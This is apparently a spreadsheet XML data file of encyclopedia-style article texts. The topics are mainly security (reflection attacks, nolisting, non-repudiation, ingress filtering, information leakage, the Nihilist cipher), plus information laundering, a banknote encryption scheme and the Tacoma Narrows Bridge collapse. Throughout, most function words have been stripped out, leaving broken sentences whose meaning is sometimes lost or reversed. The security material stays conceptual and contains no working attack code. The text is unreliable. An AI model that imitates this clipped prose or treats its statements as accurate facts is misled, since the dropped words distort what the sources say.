2011. jainter kantola reflexive control cyber space (англ.) academic conferences international limited. 2016. июль. 155–162. kasapoglu russia's renewed military thinking: non-linear warfare reflexive control (англ.) research division, nato defence college research paper. 2015. ноябрь (no. 121). 1–12. issn 2076-0949. thomas psycho viruses reflexive control: russian theories information-psychological information war: from china's three warfares nato's narratives. london: legatum institute, 2015. vol. september. 16–21. (beyond propaganda). isbn 978-1-907409-93-6.</t>
  </si>
  <si>
    <t>Reflection attack</t>
  </si>
  <si>
    <t>computer security, reflection attack method attacking challenge–response authentication system uses protocol directions. that challenge–response protocol used side authenticate side. essential idea attack trick target providing answer challenge. attack general attack outline follows: attacker initiates connection target. target attempts authenticate attacker sending challenge. attacker opens another connection target, sends target challenge own. target responds challenge. attacker sends response back target original connection.if authentication protocol carefully designed, target accept response valid, thereby leaving attacker fully authenticated channel connection (the simply abandoned). simple terms, type attack, attacker spoofs address target, sends query server exploiting vulnerability arises open nature misconfigured server, server distinguishing spoofed address real one, thus believes authentic request, turn provides response query. solution some common solutions attack described below: responder sends identifier within response receives response identifier reject it.alice initiates connection challenges alice sending nonce. alice responds sending back calculated identifier nonce using shared kab. mackab{a, checks message verifies mac, making sure alice message sent past making sure verifies nonce sent challenge, accepts message.require initiating party first respond challenges target party responds challenges. require protocol different directions. also replay attack man-in-the-middle attack pass hash references</t>
  </si>
  <si>
    <t>Nirbhaya (app)</t>
  </si>
  <si>
    <t>nirbhaya mobile phone provided uttar pradesh police (and kerala too) india designed enhance safety women. currently available noida residents available beta version nirbhaya@noida: fearless!.uttar pradesh police plans roll across uttar pradesh phased manner. named 2012 delhi gang rape. references</t>
  </si>
  <si>
    <t>Njalla</t>
  </si>
  <si>
    <t>njalla anonymous domain name registrar, hosting provider provider. established pirate founder peter sunde. history peter sunde started company 2017 middle domain registration registrants order provide anonymity.in 2020, riaa flagged njalla well cdns, apps (such telegram), hosting providers advertisers worked piracy sites blacklisted government. references external links official website</t>
  </si>
  <si>
    <t>Nofence</t>
  </si>
  <si>
    <t>nofence norwegian company makes collars farm animals (cattle, sheep, goats) discourage crossing virtual fences.oscar hovde berntsen working idea virtual fencing, alternative fixed electric fencing, since 1990s. nofence incorporated 2011. 2016, pilot project norway goats. 2017, norwegian food safety authority approved nofence goats; cattle sheep 2020. nofence based batnfjordsøra, norway, office warwick.the solar-powered collars play melody "ringtone" animal reaches fence, continue, small shock, electric fence. farmers mobile change boundaries throughout day, avoid over-grazing. fenceless grazing supported conservationists farmers, particularly sensitive areas difficult upland areas physical fencing would impractical, expensive inappropriate.in september 2020, times reported trials conducted sites including epping forest, essex.in december 2020, nofence stated 17,000 collars norway. references external links official website</t>
  </si>
  <si>
    <t>Nolisting</t>
  </si>
  <si>
    <t>nolisting name given technique defend electronic mail domain names e-mail spam.each domain name internet series records specifying mail servers responsible accepting email messages behalf domain, preference. nolisting simply adding record pointing non-existent server "primary" (i.e. lowest weighted value) means initial mail contact always fail. many spam sources retry failure, spammer move next victim legitimate email servers retry next higher numbered normal email delivered small delay. implementation simple example records demonstrate technique: dummy.example.com. real-primary-mail-server.example.com. this defeats spam programs connect highest priority (lowest numbered) follow standard error-handling retrying next priority drawbacks technique relies spammers using simple software retry next priority becomes ineffective spammers begin using sophisticated software. some legitimate smtp applications also simple send lowest numbered record. this might case simple devices printers data loggers, older legacy software. mail also fail unless mechanism allow "whitelist" access mailserver lowest numbered record. important highest priority (lowest numbered) completely unresponsive port open responds error, (i.e. "retry later"), email mtas (such qmail), lost step next record, instead wait continually retry first one. similar techniques there alternate techniques suggest "sandwiching" valid records non-responsive ones. some variants also suggest configuring highest-numbered hosts always return errors (i.e. "retry later").a simple example records demonstrate technique: dummy1.example.com. real-primary-mail-server.example.com. dummy2.example.com. greylisting also relies fact spammers often custom software persevere deliver message correct rfc-compliant way. also greylisting anti-spam techniques references external links nolisting: poor man's greylisting fight spam with nolisting article slashdot other trick blocking spam concept using fake records discussed.</t>
  </si>
  <si>
    <t>Non-repudiation</t>
  </si>
  <si>
    <t>non-repudiation refers situation statement's author cannot successfully dispute authorship validity associated contract. term often seen legal setting authenticity signature challenged. instance, authenticity "repudiated".for example, mallory buys cell phone $100, writes paper cheque payment, signs cheque pen. later, finds can't afford claims cheque forgery. signature guarantees mallory could signed cheque, mallory's bank must cheque. this non-repudiation; mallory cannot repudiate cheque. practice, pen-and-paper signatures hard forge, digital signatures hard break. security general, non-repudiation involves associating actions changes unique individual. example, secure area card access system non-repudiation would violated cards shared lost stolen cards immediately reported. similarly, owner computer account must allow others giving away password, policy implemented enforce this. digital security digital security, non-repudiation means: service provides proof integrity origin data. authentication said genuine high confidence.proof data integrity typically easiest requirements accomplish. data hash sha2 usually ensures data changed undetectably. even safeguard, possible tamper data transit, either man-in-the-middle attack phishing. because this, data integrity best asserted recipient already possesses necessary verification information, mutually authenticated.the common method provide non-repudiation context digital communications storage digital signatures, powerful tool provides non-repudiation publicly verifiable manner. message authentication codes (mac), useful communicating parties arranged shared secret possess, give non-repudiation. misconception encrypting, provides authentication message decrypts properly authentic" wrong! subject several types attacks, like: message reordering, block substitution, block repetition, .... thus providing message integrity authentication, non-repudiation. achieve non-repudiation must trust service certificate generated trusted third party (ttp) called certificate authority (ca)) prevents entity denying previous commitments actions (e.g. sending message difference digital signatures, uses symmetric keys asymmetric keys (provided ca). note goal achieve confidentiality: cases (mac digital signature), simply appends otherwise plaintext, visible message. confidentiality also required, encryption scheme combined digital signature, form authenticated encryption could used. verifying digital origin means certified/signed data likely came someone possesses private corresponding signing certificate. used digitally sign message properly safeguarded original owner, digital forgery occur. trusted third parties (ttps) mitigate risk people repudiating signatures, standard approach involve trusted third party.the common ttps forensic analysts notaries. forensic analyst specializing handwriting compare signature known valid signature assess legitimacy. notary witness verifies individual's identity checking credentials affixing certification person signing claim notary provides extra benefit maintaining independent logs transactions, complete types credentials checked, another signature verified forensic analyst. this double security makes notaries preferred form verification.for digital information, commonly employed certificate authority, issues public certificates. public certificate used anyone verify digital signatures without shared secret signer verifier. role certificate authority authoritatively state certificate belongs, meaning person entity possesses corresponding private key. however, digital signature forensically identical legitimate forged uses. someone possesses private create valid digital signature. protecting private idea behind smart cards united states department defense's common access card (cac), never lets leave card. that means card encryption digital signatures, person needs personal identification number (pin) code necessary unlock also plausible deniability shaggy defense designated verifier signature information security undeniable signature references external links "non-repudiation electronic commerce" (jianying zhou), artech house, 2001 'non-repudiation' taken stephen mason, electronic signatures (3rd edn, cambridge university press, 2012) 'non-repudiation' legal context stephen mason, electronic signatures (4th edn, institute advanced legal studies humanities digital library, school advanced study, university london, 2016) open source</t>
  </si>
  <si>
    <t>Noreen</t>
  </si>
  <si>
    <t>noreen, 590, off-line one-time tape cipher machine british origin. usage well used united kingdom, noreen used canada. widely used diplomatic stations. according display note surviving unit publicly displayed bletchley park united kingdom, system predominantly used foreign office british embassies overseas electricity supply unreliable." usage lasted mid-1960s 1990. compatibility completely compatible rockex. power supply units powered batteries twelve volts respectively, though known powered mains. other uses name "noreen" noreen name wooden dragger acquired u.s. navy world converted minesweeper heath (amc-6). noreen common name americas, ireland, scotland, middle east. also spelt naureen, noirin nowrin (نورين). arabic, word means "luminous"'. ireland scotland, 'noreen' anglicized version 'nóirín', diminutive 'nora'. external links jerry proc's page noreen noreen crypto museum website</t>
  </si>
  <si>
    <t>Norwegian Cyber Defence Force</t>
  </si>
  <si>
    <t>norwegian cyber defence force (norwegian: cyberforsvaret) branch norwegian armed forces responsible military communications defensive cyberwarfare norway. force employs 1,500 people located locations. main base jørstadmoen lillehammer, secondary base kolsås outside oslo. cyber defence established branch september 2012. also list cyber warfare forces references</t>
  </si>
  <si>
    <t>Not Just Another Bogus List</t>
  </si>
  <si>
    <t>just another bogus list (njabl) blacklist. njabl maintained list known potential spam sources (open mail relays, open proxies, open form mail http gateways, dynamic pools, direct spammers) purpose able refuse e-mail thereby block spam certain sources. njabl automatically retests listed open relays every days.the open proxy portion (only) njabl data used spamhaus list njabl's dynamic list originally came dynablock maintained independently since dynablock stopped updating december 2003. sorbs dynamic list also development dynablock, aggressively inclusive njabl's version. march 2013, njabl process shut down. dnsbl zones emptied. after "the internet" time remove njabl server configs, ns's pointed unallocated space (192.0.2.0/24 test-net-1) hopefully make shutdown obvious slower notice. april above-mentioned pointing dnsbl ns's 192.0.2.0/24 done. 02/2019, domain name njabl.org expire servers switched tucows autorenew servers would cause lookups servers still removed configuration rejections. references external links official website</t>
  </si>
  <si>
    <t>Nihilist cipher</t>
  </si>
  <si>
    <t>history cryptography, nihilist cipher manually operated symmetric encryption cipher, originally used russian nihilists 1880s organize terrorism tsarist regime. term sometimes extended several improved algorithms used much later communication first chief directorate spies. description first encipherer constructs polybius square using mixed alphabet. this used convert plaintext keyword series digit numbers. these numbers added together normal ciphertext, numbers repeated required. example consider polybius square created using keyword zebras: plaintext "dynamite winter palace" russian. this expands key: cryptanalysis because symbol plaintext used whole number without fractionation, basic nihilist cipher little numerical version vigenère cipher, multiple-digit numbers enciphered symbols instead letters. such, attacked similar methods. additional weakness normal addition (instead modular addition) leaks information. example, (assuming square) ciphertext number greater certainty plaintext came fifth table. later variants derivatives during world several soviet rings communicated moscow centre using ciphers essentially evolutionary improvements basic nihilist cipher. strong version used clausen richard sorge's network japan, alexander foote lucy ring switzerland. slightly weaker version used rote kapelle network.in versions, plaintext first converted digits straddling checkerboard rather polybius square. this advantage slightly compressing plaintext, thus raising unicity distance also allowing radio operators complete transmissions quicker shut sooner. shutting sooner reduces risk operator found enemy radio direction finders. increasing unicity distance increases strength statistical attacks. clausen foote wrote plaintext english, memorized frequent letters english fill checkerboard) mnemonic (and slightly menacing) phrase err" (dropping second "r"). standard english straddling checkerboard characters cipher became "full stop" "numbers shift". numbers sent numbers shift, followed actual plaintext digits repeated pairs, followed another shift. then, similarly basic nihilist, digital additive added called "closing". however different additive used time, finally concealed "indicator group" inserted indicate additive used. unlike basic nihilist, additive added non-carrying addition (digit-wise addition modulo 10), thus producing uniform output leak much information. more importantly, additive generated keyword, selecting lines random almanacs industrial statistics. such books deemed dull enough arouse suspicion agent searched (particularly agents' cover stories businessmen), high entropy density provide secure additive. course figures book actually uniformly distributed (there excess (see benford's law), sequential numbers likely somewhat similar), nevertheless much higher entropy density passphrases like; rate, practice seem never successfully cryptanalysed. weaker version generated additive text novel similar book least rote kapelle member used good soldier schweik) this text converted digital additive using technique similar straddling checkerboard. ultimate development along lines cipher, used 1950s reino häyhänen. time, soviet agents instead using one-time pads. also topics cryptography references david kahn. codebreakers. 1968, 1974 edition redwood burn ltd. 344, 368. external links javascript implementation various nihilist ciphers</t>
  </si>
  <si>
    <t>Ingress filtering</t>
  </si>
  <si>
    <t>computer networking, ingress filtering technique used ensure incoming packets actually networks claim originate. this used countermeasure various spoofing attacks attacker's packets contain fake addresses. spoofing often used denial-of-service attacks, mitigating primary application ingress filtering. problem networks receive packets networks. normally packet contain address computer originally sent this allows devices receiving network know came from, allowing reply routed back (amongst things), except addresses used proxy spoofed address, pinpoint specific user within pool users. sender address faked (spoofed), characterising spoofing attack. this disguises origin packets sent, example denial-of-service attack. holds true proxies, although different manner spoofing. potential solutions potential solution involves implementing intermediate internet gateways (i.e., servers connecting disparate networks along path followed given packet) filtering denying packet deemed illegitimate. gateway processing packet might simply ignore packet completely, possible, might send packet back sender relaying message illegitimate packet denied. host intrusion prevention systems (hips) example technical engineering applications help identify, prevent and/or deter unwanted, unsuspected and/or suspicious events intrusions. router implements ingress filtering checks source field packets receives, drops packets packets address address block interface connected. this possible host multi-homed also sends transit network traffic. ingress filtering, packets coming network filtered network sending send packets originating address(es). host stub network host, router needs filter packets have, source private addresses (rfc 1918), bogon addresses addresses network address interface. networks network ingress filtering packet filtering technique used many internet service providers prevent address spoofing internet traffic, thus indirectly combat various types abuse making internet traffic traceable source. network ingress filtering makes much easier track denial-of-service attacks source(s) fixed.network ingress filtering good neighbor policy relies cooperation isps mutual benefit. best current practices network ingress filtering documented internet engineering task force defined 2827 3704, respectively.bcp recommends upstream providers connectivity filter packets entering networks downstream customers, discard packets source address allocated customer. there many possible ways implementing policy; common mechanism enable reverse-path forwarding links customers, indirectly apply policy based provider's route filtering customers' route announcements. deployment 2012, report suggests that, contrary general opinion lack deployment, internet various measures) already applying anti-spoofing packet filtering networks.at least computer security expert favor passing requiring 100% isps implement network ingress filtering defined ietf presumably would enforce law. also egress filtering ingress cancellation prefix hijacking references external links 2827 network ingress filtering: defeating denial service attacks employ source address spoofing (bcp 3704 ingress filtering multihomed networks (bcp ashworth. "bcp38.info". ietf's index routing manrs</t>
  </si>
  <si>
    <t>Information leakage</t>
  </si>
  <si>
    <t>information leakage happens whenever system designed closed eavesdropper reveals information unauthorized parties nonetheless. words: information leakage occurs secret information correlates with, correlated with, observable information. example, designing encrypted instant messaging network, network engineer without capacity crack encryption codes could messages transmitted, even could read them. risk vectors modern example information leakage leakage secret information data compression, using variations data compression ratio reveal correlations known deliberately injected) plaintext secret data combined single compressed stream. another example leakage occur using public-key systems cryptographic nonce values used signing operations insufficiently random. randomness cannot protect proper functioning cryptographic system, even benign circumstance, easily produce crackable keys cause leakage.information leakage sometimes deliberate: example, algorithmic converter shipped intentionally leaks small amounts information, order provide creator ability intercept users' messages, still allowing user maintain illusion system secure. this sort deliberate leakage sometimes known subliminal channel.generally, advanced systems employ defenses information leakage. following commonly implemented countermeasures steganography hide fact message transmitted all. chaffing make unclear messages transmitted (but hide others fact messages transmitted). busy re-transmitting proxies, mixmaster node: randomly delay shuffle order outbound packets assist disguising given message's path, especially multiple, popular forwarding nodes, employed mixmaster mail forwarding. when data value longer going used, erase memory. also kleptographic attack side-channel attack traffic analysis references</t>
  </si>
  <si>
    <t>Information laundering</t>
  </si>
  <si>
    <t>information laundering surfacing news, false otherwise, unverified sources mainstream. advancing disinformation makes accepted ostensibly legitimate information, information laundering resembles money laundering—the transforming illicit funds ostensibly legitimate funds.in adversarial machine learning, information laundering refers general strategy purposely alters information released adversaries, goal alleviating model stealing attacks. descriptions information laundering, summarized american comedian commentator stewart, happen relatively reputable news organizations report something blog platform unknown credibility written. these news organizations attribute assertion, another publication omit original source. "that piece information news came from] laundered," stewart says, original assertion, whether source credible, gains credibility, especially used outlets known high standards.pace university's adam klein, developed theory, argues information laundering similar criminals launder illegal funds financial institutions. case information laundering, illegitimate exchanges information flow social networks, political blogs, search engines, intermix mainstream ideas, gradually become washed radical origins. according klein, "[c]onspiracies grow communities like reddit twitter, incubators. then graduate onto respected websites political blogs, sometimes, they’re picked mainstream news outlets 'trusted information'."digital platforms especially vulnerable information laundering efforts; faked videos (deepfakes) images (photograph manipulation), instance, create media moments spread disinformation. according karen kornbluh, director german marshall fund’s digital innovation democracy initiative, ellen goodman, director rutgers institute information policy law, bots, fake accounts click farms "pretend people they’re create false sense consensus", commercial platforms, "designed keep users online served ads, privileging engagement truth public interest. what drives engagement often outrage disgust, algorithm rewards."according report nato 2020, state actors engage information laundering, particularly russia, "are generally supported cyber capabilities enhance spread amplification laundered piece, e.g. creation fake personas burner accounts, sophisticated manipulation information, e.g. distribution forged letters." similar phrase, idea laundering, describes academicians advance non-scientific ideas knowledge fact.we describe another kind plagiarism called idea laundering, analogous concept practice money laundering, ideas plagiarized plagiarism hidden plain sight. clarify analogy, first define money laundering passing money illegitimately obtained another illegitimate process intent making appear legitimate, making dirty money look clean. then define idea laundering passing ideas illegitimately obtained another illegitimate process intent making appear legitimate, making dirty ideas look clean.similarly, citation laundering colloquial term used refer number practices including:hiding self-citation citing someone referenced one's work. (sometimes also called "stealth citation". individual self-citation confused journal self-citation, commonly known coercive citation.) citing number recent works ultimately pull information flawed source. this intentional disinformation accidental lack rigor.self-citation practices usually done intent increasing scholar's resesarch impact terms metrics h-index; groups scholars form "citation farms" "citation cartels" aggrandize other's work. self- co-citation also contribute information laundering increases seeming authority claim without rigorously investigating source. examples 2013, wikileaks, publishes secret information anonymous sources, said commentary jonathan holmes australia information laundering.information laundering alleged spreading false news social media 2018 mexican election.american intelligence officials russia used information laundering spread disinformation west covid-19 pandemic 2020 elections united states. russian effort included network fake accounts social media. russian propaganda using information laundering also suspected stoking fears technology. alliance securing democracy, american group opposes russian efforts undermine western elections, cites maskirovka, soviet-era military doctrine translates 'mask' 'masquerade', precursor russian information laundering.local "save children" rallies 2020 supporters qanon, american far-right conspiracy theory, example information laundering, qanon hijacked unifying cause attempts attract credulous local television news coverage, according brandy zadrozny news. also trading chain astroturfing circular reporting citogenesis references</t>
  </si>
  <si>
    <t>Tagged Message Delivery Agent</t>
  </si>
  <si>
    <t>tmda open-source software application designed reduce amount junk email user receives. tmda's main difference anti-spam systems challenge/response system bulk mailing machines programs either unwilling save bandwidth) unable (due lack programming) answer. technical countermeasures used tmda thwart spam include: whitelists: whitelists essentially ‘accept list’. messages addresses lists automatically allowed matter content blacklists: blacklists ‘block list’. messages addresses lists automatically blocked. challenge/response (c/r): controversial system challenge emails sent unfamiliar sending addresses attempt validate addresses associated emails. legitimate senders approved thus tasked additional “response” effort sending mail. also, spam often crafted forged sending addresses, people, otherwise unrelated incident, sent spurious challenges form backscatter. tagged addresses: special-purpose e-mail addresses time-dependent addresses, addresses accept certain kinds communication. these increase transparency tmda unknown senders allowing safely circumvent challenge/response system. external links tmda homepage tmda sourceforge.net tmda history</t>
  </si>
  <si>
    <t>Dynamic Intelligent Currency Encryption</t>
  </si>
  <si>
    <t>dynamic intelligent currency encryption (dice) ai-controlled security technology, devaluates banknotes assets remotely stolen illegal. cash security system based identifiable banknotes, invented first introduced 2014 ai-specialised british-austrian technology company edaqs. system claims rfid-equipped banknotes securities registered centralized safe system considered unforgeable, contributes solve cash-related problems helps fight black economy, crime terrorism. main goals dice whole banking retail sector, well entities regular cash circulation participate passively controlled cash system. second note, dice procedure meant alternative abolition cash offering benefits cashless economy, driving global crime violently obtaining cash. similar ibns, registered dice banknotes neutralized, cannot brought back circulation directly linked crime related issue. concept concept relies registration banknotes connected readers called dice clouds. fast registration banknote dice-cloud device, influence day-to-day business terms time delay, offers full protection registered cash assets dice user. during registration-procedure, dice user informed legitimacy incoming banknote warned, whether banknote part crime, forged degraded certain reason. once banknote successfully assigned user’s account, robbery also destruction banknote catastrophes, fire flood, would result executive remote devaluation notes. victim would receive banknotes. dice also considered effective technology limit circulation black money combat black economy. technology basic process consists identifiable banknote, carries identification module (machine readable code microrfid-chip), blockchain-enabled cloud device, scans, reads registers banknotes well composition ai-driven automated systems based several sub-systems. mechanism systems based proprietary consortium blockchain provides centralized registry banknotes (cedire hyperledger), digital pack system deactivates re-activates illegal degraded banknotes remotely (renode) course dice automated security unit, whose task monitor system’s functionality. rfid-banknotes addition mrc-equipped banknotes, dice also introduced banknotes specifically designed microchip developed high security application perfectly suited paper currencies, chip damaged harsh handling daily well intaglio process. edaqs claims so-called rfit microchip, developed australian partner rfit limited, secure robust development rfid tagging technology date well smallest chip antenna (oca) rfid world. with overall size 0.45mm 0.45mm 0.2mm, patented technology places antenna directly onto chip silicon. every aspect rfit chip conforms electronic product code (epc) class gen2 18000-6c. data areas programmable, rfit inlay offers individualized secure electronic tracking. requiring specially designed near field antenna (nfa) activate passive rfit tag, read range limited 3mm, provides security feature compared standard rfid tags. additional level security, normal rfid reader able activate read tag. reception dice banknote system would allow central national banks supervise analyze entire registered cash circulation. while main reasons caused trend national banks favor cashless economy, also serious issue terms privacy. edaqs affirmed citizen’s privacy rights touched system anonymous circulation data would open wide range development models governments national banks, also economic analyses stability research. public response introduction dice ranged tremendous fear chip-equipped banknotes strong support improving public safety. keesing journal, opinion leading publication document security industry, called dice-equipped banknotes "banknote future", despite harsh critics different political parties, including german austrian pirates party.in another note, dice benefits cover solve almost cash-related issues seen governments motivation progressive abolition cash. also intelligent banknote neutralisation system banknote references</t>
  </si>
  <si>
    <t>Tacoma Narrows Bridge (1940)</t>
  </si>
  <si>
    <t>1940 tacoma narrows bridge, first tacoma narrows bridge, suspension bridge u.s. state washington spanned tacoma narrows strait puget sound tacoma kitsap peninsula. opened traffic july 1940, dramatically collapsed puget sound november year. bridge's collapse described "spectacular" subsequent decades "has attracted attention engineers, physicists, mathematicians". throughout short existence, world's third-longest suspension bridge main span, behind golden gate bridge george washington bridge. construction began september 1938. from time deck built, began move vertically windy conditions, construction workers nicknamed bridge galloping gertie. motion continued bridge opened public, despite several damping measures. bridge's main span finally collapsed 40-mile-per-hour km/h) winds morning november 1940, deck oscillated alternating twisting motion gradually increased amplitude deck tore apart. portions bridge still standing collapse, including towers cables, dismantled sold scrap metal. efforts replace bridge delayed united states' entry world 1950, tacoma narrows bridge opened location, using original bridge's tower pedestals cable anchorages. portion bridge fell water serves artificial reef. bridge's collapse lasting effect science engineering. many physics textbooks, event presented example elementary forced mechanical resonance, complicated reality; bridge collapsed moderate winds produced aeroelastic flutter self-exciting unbounded: constant sustained wind speed km/h), amplitude (torsional) flutter oscillation would continuously increase, negative damping factor, i.e., reinforcing effect, opposite damping. collapse boosted research bridge aerodynamics-aeroelastics, influenced designs later long-span bridges. design construction proposals bridge tacoma kitsap peninsula date least northern pacific railway's 1889 trestle proposal, concerted efforts began mid-1920s. tacoma chamber commerce began campaigning funding studies 1923. several noted bridge engineers consulted, including joseph strauss, went chief engineer golden gate bridge, david steinman, later designer mackinac bridge. steinman made several chamber-funded visits presented preliminary proposal 1929, 1931 chamber canceled agreement grounds steinman working hard enough obtain financing. 1938 meeting structural division american society civil engineers, construction bridge, designer audience, steinman predicted failure.in 1937, washington state legislature created washington state toll bridge authority appropriated $5,000 (equivalent $89,000 today) study request tacoma pierce county bridge narrows.from start, financing bridge problem: revenue proposed tolls would enough cover construction costs; another expense buying ferry contract private firm running services narrows time. nonetheless, strong support bridge united states navy, operated puget sound naval shipyard bremerton, united states army, mcchord field fort lewis near tacoma.washington state engineer clark eldridge produced preliminary tried-and-true conventional suspension bridge design, washington state toll bridge authority requested million (equivalent $196 million today) federal public works administration (pwa). preliminary construction plans washington department highways called 25-foot-deep (7.6 trusses beneath roadway stiffen however, "eastern consulting engineers" eldridge meant leon moisseiff, noted york bridge engineer served designer consultant engineer golden gate bridge petitioned reconstruction finance corporation (rfc) build bridge less. moisseiff frederick lienhard, latter engineer known york port authority, published paper probably important theoretical advance bridge engineering field decade. their theory elastic distribution extended deflection theory originally devised austrian engineer josef melan horizontal bending static wind load. they showed stiffness main cables (via suspenders) would absorb one-half static wind pressure pushing suspended structure laterally. this energy would transmitted anchorages towers. using theory, moisseiff argued stiffening bridge eight-foot-deep (2.4 plate girders rather 25-foot-deep (7.6 trusses proposed washington state toll bridge authority. this approach meant slimmer, elegant design, also reduced construction costs compared highway department's design proposed eldridge. moisseiff's design out, inasmuch proposal considered expensive. june 1938, approved nearly million (equivalent $115.5 million today) tacoma narrows bridge. another $1.6 million ($30.8 million today) collected tolls cover estimated total million cost ($154 million today). following moisseiff's design, bridge construction began september 1938. construction took nineteen months, cost $6.4 million ($123.2 million today), financed grant loan rfc. tacoma narrows bridge, main span 2,800 feet (850 third-longest suspension bridge world time, following george washington bridge jersey york city, golden gate bridge, connecting francisco marin county north.because planners expected fairly light traffic volumes, bridge designed lanes, feet wide. this quite narrow, especially comparison length. with 8-foot-deep (2.4 plate girders providing additional depth, bridge's roadway section also shallow. decision shallow narrow girders proved bridge's undoing. with minimal girders, deck bridge insufficiently rigid easily moved winds; start, bridge became infamous movement. mild moderate wind could cause alternate halves center span visibly rise fall several feet four- five-second intervals. this flexibility experienced builders workmen construction, workers christen bridge "galloping gertie". nickname soon stuck, even public (when toll-paid traffic started) felt motions bridge opened july 1940. attempt control structural vibration since structure experienced considerable vertical oscillations still construction, several strategies used reduce motion bridge. they included attachment tie-down cables plate girders, anchored 50-ton concrete blocks shore. this measure proved ineffective, cables snapped shortly installation. addition pair inclined cable stays connected main cables bridge deck mid-span. these remained place collapse, also ineffective reducing oscillations. finally, structure equipped hydraulic buffers installed towers floor system deck damp longitudinal motion main span. effectiveness hydraulic dampers nullified, however, seals units damaged bridge sand-blasted painted.the washington state toll bridge authority hired professor frederick burt farquharson, engineering professor university washington, make wind tunnel tests recommend solutions order reduce oscillations bridge. professor farquharson students built 1:200-scale model bridge 1:20-scale model section deck. first studies concluded november 1940—five days bridge collapse november proposed solutions: drill holes lateral girders along deck flow could circulate reducing lift forces). give aerodynamic shape transverse section deck adding fairings deflector vanes along deck, attached girder fascia.the first option favored, irreversible nature. second option chosen one, carried out, bridge collapsed five days studies concluded. collapse leonard coatsworth, editor news tribune tacoma, last person drive bridge: around could hear concrete cracking. started back dog, thrown could reach began slide side side roadway. decided bridge breaking hope back shore. hands knees time, crawled yards [1,500 towers breath coming gasps; knees bleeding, hands bruised swollen gripping concrete curb towards last, risked rising feet running yards time safely back toll plaza, bridge final collapse plunge narrows. tubby, coatsworth's cocker spaniel, fatality tacoma narrows bridge disaster; lost along coatsworth's car. professor farquharson news photographer attempted rescue tubby lull, terrified leave rescuers. tubby died bridge fell neither body ever recovered. coatsworth driving tubby back daughter, owned dog. coatsworth received $450.00 (equivalent $8,700 today) $364.40 ($7,000 today) reimbursement contents car, including tubby. inquiry theodore kármán, director guggenheim aeronautical laboratory world-renowned aerodynamicist, member board inquiry collapse. reported state washington unable collect insurance policies bridge insurance agent fraudulently pocketed insurance premiums. agent, hallett french, represented merchant's fire assurance company, charged tried grand larceny withholding premiums $800,000 worth insurance (equivalent $15.5 million today). bridge insured many policies covered $5.2 million structure's value (equivalent $100.6 million today). most collected without incident.on november 1940, u.s. navy's hydrographic office reported remains bridge located geographical coordinates 47°16′n 122°33′w, depth feet meters). film collapse least four people captured collapse bridge. collapse bridge recorded film separately barney elliott harbine monroe, owners camera shop tacoma. film shows leonard coatsworth attempting rescue without success leaving bridge. film subsequently sold paramount studios, duplicated newsreels black-and-white distributed worldwide movie theaters. castle films also received distribution rights home video. 1998, tacoma narrows bridge collapse selected preservation united states national film registry library congress culturally, historically, aesthetically significant. this footage still shown engineering, architecture, physics students cautionary tale.elliott monroe's films construction collapse shot kodachrome film, copies circulation black white newsreels copied film onto black-and-white stock. there also film-speed discrepancies monroe's elliot's footage, monroe filming frames second elliott frames second. result, copies circulation also show bridge oscillating approximately faster real time, assumption conversion film shot frames second rather actual fps.a second reel film emerged february 2019, taken arthur leach harbor (westward) side bridge, known images collapse side. leach civil engineer served toll collector bridge, believed last person cross bridge west collapse, trying prevent crossings west bridge started collapse. leach's footage (originally film recorded video cassette filming projection) also includes leach's commentary time collapse. federal works agency commission commission formed federal works agency studied collapse bridge. included othmar ammann theodore kármán. without drawing definitive conclusions, commission explored three possible failure causes: aerodynamic instability self-induced vibrations structure eddy formations might periodic nature random effects turbulence, random fluctuations velocity wind. cause collapse original tacoma narrows bridge first built girders carbon steel anchored concrete blocks; preceding designs typically open lattice beam trusses underneath roadbed. this bridge first type employ plate girders (pairs deep i-beams) support roadbed. with earlier designs, wind would simply pass truss, design wind would diverted structure. shortly construction finished june (opened traffic july 1940), discovered bridge would sway buckle dangerously relatively mild windy conditions common area, worse severe winds. this vibration transverse, one-half central span rising lowered. drivers would cars approaching direction rise fall, riding violent energy wave bridge. however, time mass bridge considered sufficient keep structurally sound. failure bridge occurred never-before-seen twisting mode occurred, winds miles hour km/h). this so-called torsional vibration mode (which different transversal longitudinal vibration mode), whereby left side roadway went down, right side would rise, vice versa, i.e., halves bridge twisted opposite directions, center line road remaining still (motionless). this vibration caused aeroelastic fluttering. fluttering physical phenomenon several degrees freedom structure become coupled unstable oscillation driven wind. here, unstable means forces effects cause oscillation checked forces effects limit oscillation, self-limit grows without bound. eventually, amplitude motion produced fluttering increased beyond strength vital part, case suspender cables. several cables failed, weight deck transferred adjacent cables, became overloaded broke turn almost central deck fell water span. resonance (due kármán vortex street) hypothesis bridge's spectacular destruction often used object lesson necessity consider aerodynamics resonance effects civil structural engineering. billah scanlan (1991) reported that, fact, many physics textbooks (for example resnick tipler al.) wrongly explain cause failure tacoma narrows bridge externally forced mechanical resonance. resonance tendency system oscillate larger amplitudes certain frequencies, known system's natural frequencies. frequencies, even relatively small periodic driving forces produce large amplitude vibrations, system stores energy. example, child using swing realizes pushes properly timed, swing move large amplitude. driving force, case child pushing swing, exactly replenishes energy system loses frequency equals natural frequency system. usually, approach taken physics textbooks introduce first order forced oscillator, defined second-order differential equation stand mass, damping coefficient stiffness linear system represent amplitude angular frequency exciting force. solution ordinary differential equation function time represents displacement response system (given appropriate initial conditions). system resonance happens approximately {\displaystyle \omega _{r}={\sqrt {k/m}}} i.e., {\displaystyle \omega _{r}} natural (resonant) frequency system. actual vibration analysis complicated mechanical system airplane, building bridge based linearization equation motion system, multidimensional version equation (eq. analysis requires eigenvalue analysis thereafter natural frequencies structure found, together so-called fundamental modes system, independent displacements and/or rotations specify completely displaced deformed position orientation body system, i.e., bridge moves (linear) combination basic deformed positions. each structure natural frequencies. resonance occur, necessary also periodicity excitation force. tempting candidate periodicity wind force assumed so-called vortex shedding. this bluff (non-streamlined) bodies like bridge decks fluid stream shed wakes, whose characteristics depend size shape body properties fluid. these wakes accompanied alternating low-pressure vortices downwind side body, so-called kármán vortex street kármán vortex street. body consequence move toward low-pressure zone, oscillating movement called vortex-induced vibration. eventually, frequency vortex shedding matches natural frequency structure, structure begin resonate structure's movement become self-sustaining. frequency vortices kármán vortex street called strouhal frequency {\displaystyle f_{s}} given here, stands flow velocity, characteristic length bluff body dimensionless strouhal number, depends body question. reynolds numbers greater 1000, strouhal number approximately equal 0.21. case tacoma narrows, approximately feet (2.4 0.20. thought strouhal frequency close enough natural vibration frequencies bridge, i.e., {\displaystyle 2\pi f_{s}=\omega cause resonance therefore vortex-induced vibration. case tacoma narrows bridge, appears cause catastrophic damage. according professor frederick burt farquharson, engineering professor university washington main researchers cause 